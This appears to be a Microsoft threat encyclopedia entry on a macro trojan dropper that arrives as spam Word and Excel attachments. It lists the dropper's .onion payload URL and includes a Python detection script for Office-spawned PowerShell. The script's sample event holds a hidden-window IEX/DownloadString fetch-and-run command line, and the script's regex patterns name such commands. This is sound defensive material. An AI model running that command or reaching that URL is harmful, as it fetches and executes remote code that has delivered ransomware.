
TrojanDropper:O97M/Poshkod.gen!A


First posted on 30 April 2014.
Source: Microsoft

Aliases:

There are no other names known for TrojanDropper:O97M/Poshkod.gen!A.

Explanation:

Threat behavior

TrojanDropper:O97M/Poshkod.gen!A is a generic detection for malicious macros. They run when a Microsoft Word document or Microsoft Excel spreadsheet is opened and Visual Basic for Applications (VBA) macros are enabled on your PC.

We have seen these threats attached to spam emails as a .doc or .xlsx file with one of the following file names:

  • Round 1 match report.docm
  • Um-Hazaa List.xls
  • U11 Comets Round 1.docm
  • 2014 U11 AJAX Commets Sign in Sheet.xls
  • 2014 - Doc#10 - AJAX - U11 Commets Round 1 Match Report.docm
  • 2014 - Doc_10 - AJAX - Template - Match Report (example).doc


TrojanDropper:O97M/Poshkod.gen!A downloads and runs a malicious PowerShell script from the following URL:

  • http://powerwormjqj42hu.onion/get.php?s=setup&mom=4C4C4544-0050-3010-804C-B4C04F4C5131&uid=


The malicious script is invoked in memory and might never be written to disk. It can perform any actions of the attacker's choice, and those actions can change at any time. We have seen it download ransomware.
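Because the script is fetched and run by a PowerShell process that the Office application spawns when the macro fires, one host-side detection is to flag process-creation events where WINWORD.EXE or EXCEL.EXE is the parent of powershell.exe and the command line carries download-and-execute arguments. The example below is added here and is not Microsoft's code; the Sysmon-style field names (Image, ParentImage, CommandLine, ProcessId), the indicator list and the sample events are assumptions, and the URL is a constructed placeholder.

```python
import json
import re

# Office hosts that run VBA macros; powershell.exe spawned by one of them is the
# parent/child relationship this detection keys on (image names are assumptions).
OFFICE_PARENTS = {"winword.exe", "excel.exe"}

# Command-line fragments typical of fetch-and-run-in-memory PowerShell usage.
INDICATORS = {
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden-or-bypass": re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "url": re.compile(r"https?://\S+", re.I),
}

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return (hit, reasons); fields Image, ParentImage, CommandLine are assumed (Sysmon-style)."""
    if _basename(event.get("Image", "")) != "powershell.exe" \
            or _basename(event.get("ParentImage", "")) not in OFFICE_PARENTS:
        return False, []
    reasons = [name for name, rx in INDICATORS.items() if rx.search(event.get("CommandLine", ""))]
    # Office -> PowerShell alone is worth a look; two or more indicators is a firm hit.
    return len(reasons) >= 2, reasons

def scan(lines):
    """Scan JSON-lines process-creation records; return [(ProcessId, reasons), ...]."""
    hits = []
    for event in map(json.loads, lines):
        hit, reasons = score_event(event)
        if hit:
            hits.append((event.get("ProcessId"), reasons))
    return hits

# Constructed sample events (not real telemetry); only the first should fire.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX ((New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/get.php?s=setup'))\""},
    {"ProcessId": 4201, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Command Get-ChildItem C:\\Users"},
    {"ProcessId": 4310, "Image": PS, "ParentImage": r"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE",
     "CommandLine": "powershell.exe -Command Get-Date"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]
```

Running scan(SAMPLE_LINES) returns only the WINWORD-spawned event, with all four indicator names; the explorer-spawned and the benign EXCEL-spawned PowerShell events are left alone.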



Analysis by Jireh Sanico

Symptoms

The following could indicate that you have this threat on your PC:

  • You have these files:

    Round 1 match report.docm
    Um-Hazaa List.xls
    U11 Comets Round 1.docm
    2014 U11 AJAX Commets Sign in Sheet.xls
    2014 - Doc#10 - AJAX - U11 Commets Round 1 Match Report.docm
    2014 - Doc_10 - AJAX - Template - Match Report (example).doc

Last update 30 April 2014
